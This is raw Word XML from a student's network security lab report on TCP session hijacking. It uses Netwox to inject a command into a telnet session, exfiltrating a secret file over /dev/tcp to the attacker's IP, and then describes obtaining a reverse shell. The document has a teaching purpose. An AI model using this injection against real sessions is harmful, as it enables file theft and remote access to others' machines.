                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07377C44" w14:textId="195E5A03" w:rsidR="00D34C23" w:rsidRDefault="00D34C23" w:rsidP="00D10716">
      <w:r>
        <w:t>On the attacker’s VM, we use Wireshark to view the TCP traffic over the LAN. Then we start listening for the secret message over Port 9090 and start forming our Netwox command. The following data is the malicious code we will send over the TCP connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D614BB7" w14:textId="42C68623" w:rsidR="00D00D37" w:rsidRDefault="00302485" w:rsidP="00D10716">
      <w:r>
        <w:t>\n cat /home/seed/secretmsg &gt; /de</w:t>
      </w:r>
      <w:r w:rsidR="00D34C23">
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>/tcp/10.0.2.</w:t>
      </w:r>
      <w:r w:rsidR="00760166">
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>/9090 \n</w:t>
      </w:r>
      <w:r w:rsidR="00D34C23">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00D00D37" w:rsidRPr="00D00D37">
        <w:t>'0a20636174202f686f6d652f736565642f7365637265746d7367203e202f6465762f7463702f31302e302e322e31352f39303930200a'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4ADF13" w14:textId="295CB093" w:rsidR="00A66435" w:rsidRDefault="00A66435" w:rsidP="00D10716"/>
    <w:p w14:paraId="63EEB49E" w14:textId="34102436" w:rsidR="00A66435" w:rsidRDefault="002828B4" w:rsidP="00851433">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A4A03CE" wp14:editId="7E425419">
            <wp:extent cx="5943600" cy="4472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72305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B3A3E3" w14:textId="5C8752F8" w:rsidR="00A66435" w:rsidRDefault="00A66435" w:rsidP="00D10716">
      <w:r>
        <w:t>Using the hexadecimal encoded data, and the source port, sequence number, and acknowledgment number from Wireshark, we just fill in the parameters of the Netwox 40 command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E86D2A7" w14:textId="66CACE89" w:rsidR="00A66435" w:rsidRDefault="002828B4" w:rsidP="00851433">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D6240D4" wp14:editId="1D494347">
            <wp:extent cx="4945380" cy="385644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9770" cy="3859868"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0EDACF" w14:textId="2B0D9803" w:rsidR="0006781C" w:rsidRDefault="00BF0CE0" w:rsidP="00D10716">
      <w:r>
        <w:t>When we switch back to the terminal where we were listening over port 9090, we should see the contents of the SecretMsg file returned from the Server VM. This is proof that our attack was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5677CF0F" w14:textId="438D69E1" w:rsidR="0006781C" w:rsidRDefault="0006781C" w:rsidP="0006781C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Task 5 – Creating a Reverse Shell using TCP Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4957AB0D" w14:textId="2E908484" w:rsidR="00BF0CE0" w:rsidRDefault="00084C76" w:rsidP="00BF0CE0">
      <w:r>
        <w:t xml:space="preserve">This task is similar to the previous one; however, instead of just returning a file’s contents to the Attacker’s VM, we are going to hijack the TCP session to </w:t>
      </w:r>
      <w:r w:rsidR="00851433">
        <w:t>make the Server send a Reverse Shell (backdoor interface) to the Attacker. To do this we use the following command for the data parameter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793881B5" w14:textId="0110FB36" w:rsidR="00851433" w:rsidRDefault="00851433" w:rsidP="00851433">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E902479" wp14:editId="66F93271">
            <wp:extent cx="3848100" cy="286798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4733" cy="2917647"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0381F826" w14:textId="0A7BA228" w:rsidR="00851433" w:rsidRDefault="00851433" w:rsidP="00851433">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1569F7D6" wp14:editId="0F4DFAE7">
            <wp:extent cx="2923499" cy="2190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1793" cy="2204459"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C05C00">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44088048" wp14:editId="33C8D473">
            <wp:extent cx="2966720" cy="2225040"/>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6720" cy="2225040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF77FD4" w14:textId="6D99E9DD" w:rsidR="00851433" w:rsidRDefault="00851433" w:rsidP="00851433">
      <w:r>
        <w:t>As with the previous lab, we need to use Netcat on the Attacker’s VM to have a port open and listening for the Server’s reply, as well as using WireShark to sniff for the telnet connection from the Client to the Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ADBEEB" w14:textId="47A3F908" w:rsidR="00851433" w:rsidRDefault="00C05C00" w:rsidP="00851433">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="789573CE" wp14:editId="681A99FF">
            <wp:extent cx="5943600" cy="4476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76115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D60E52" w14:textId="3A8B0D07" w:rsidR="002073BB" w:rsidRDefault="002073BB" w:rsidP="00851433">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4775BB71" wp14:editId="33E10DD7">
            <wp:extent cx="5943600" cy="4427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27855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="037FA9CD" w14:textId="39616E18" w:rsidR="00C05C00" w:rsidRDefault="00C05C00" w:rsidP="00851433">
      <w:r>
        <w:t>After running the Netwox tool to hijack the TCP session, there are two indicators that the attack was successful and are now operating within the Reverse Shell. First, we can see that the working directory changed from /home/seed/Desktop to /home/seed/. More importantly, we can see the message stating “Connection from [10.0.2.8] port 9090 [tcp/*] accepted.” This means that the Server (10.0.2.8) has opened a backdoor connection through port 9090, thus giving us access to run commands directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C96E2D" w14:textId="7AD4F026" w:rsidR="00C05C00" w:rsidRDefault="00C05C00" w:rsidP="00C05C00">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560DEBF9" w14:textId="3AA812E3" w:rsidR="00C05C00" w:rsidRPr="00C05C00" w:rsidRDefault="00C05C00" w:rsidP="00C05C00">
      <w:r>
        <w:t>This lab was very interesting and quite fun to figure out. There were a couple steps that proved frustrating, such as getting my VM’s to communicate, and making sure I was using the right syntax for the TCP hijacking tasks. However, I was able to accomplish each task and execute all attacks successfully, and learned quite a bit from the experience.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C05C00" w:rsidRPr="00C05C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F89"/>
    <w:rsid w:val="0006781C"/>
    <w:rsid w:val="00084C76"/>
    <w:rsid w:val="0015698F"/>
    <w:rsid w:val="00196674"/>
    <w:rsid w:val="001D2AC3"/>
    <w:rsid w:val="001E4201"/>
    <w:rsid w:val="002073BB"/>
    <w:rsid w:val="00256176"/>
    <w:rsid w:val="002828B4"/>
    <w:rsid w:val="002B49CC"/>
    <w:rsid w:val="00302485"/>
    <w:rsid w:val="003F31FC"/>
    <w:rsid w:val="004D5BCF"/>
    <w:rsid w:val="00570483"/>
    <w:rsid w:val="006A1964"/>
    <w:rsid w:val="00754A55"/>
    <w:rsid w:val="00760166"/>
    <w:rsid w:val="0077457D"/>
    <w:rsid w:val="007E5FEF"/>
    <w:rsid w:val="00834330"/>
    <w:rsid w:val="00851433"/>
    <w:rsid w:val="00971AC3"/>
    <w:rsid w:val="009D1FF0"/>
    <w:rsid w:val="00A66435"/>
    <w:rsid w:val="00A84039"/>
    <w:rsid w:val="00B27B4D"/>
    <w:rsid w:val="00BF0CE0"/>
    <w:rsid w:val="00C05C00"/>
    <w:rsid w:val="00D00D37"/>
    <w:rsid w:val="00D10716"/>
    <w:rsid w:val="00D34C23"/>
    <w:rsid w:val="00D5504D"/>
    <w:rsid w:val="00D86F89"/>
    <w:rsid w:val="00DE4069"/>
    <w:rsid w:val="00E06DE7"/>
    <w:rsid w:val="00F015B4"/>
    <w:rsid w:val="00F302CE"/>
    <w:rsid w:val="00F37BFA"/>
    <w:rsid w:val="00F64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4AE83"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3D775E58-F790-407A-B202-680A8B650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330"/>
    <w:pPr>
      <w:spacing w:line="254" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008343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43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4330"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle01">
    <w:name w:val="fontstyle01"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00834330"/>
    <w:rPr>
      <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:hint="default"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00834330"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0083433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0408034">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="125174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customXml" Target="ink/ink1.xm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5T18:03:48.2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25,'3'-3,"11"-10,-14 12,0 1,0 0,0 0,0 0,0-1,0 1,0 0,0 0,0 0,0-1,1 1,-1 0,0 0,0-1,0 1,-1 0,1 0,0 0,0-1,0 1,0 0,0 0,0-1,0 1,0 0,0 0,0 0,-1 0,1-1,0 1,0 0,0 0,0 0,0 0,-1-1,1 1,0 0,0 0,0 0,-1 0,1 0,0 0,0 0,-1 0,1 0,0 0,0-1,0 1,-1 0,1 0,0 0,0 1,-1-1,1 0,0 0,0 0,0 0,-1 0,1 0,0 0,0 0,0 0,-1 1,31 17,-5-8,1-1,0-1,1-1,39 4,112 2,406-9,-80-2,153 7,-580-9,-74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A7538-D960-47EB-BF07-FDBCC161C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11</Pages>
  <Words>749</Words>
  <Characters>4273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Franck</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jon Franck</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-13T23:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-18T05:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>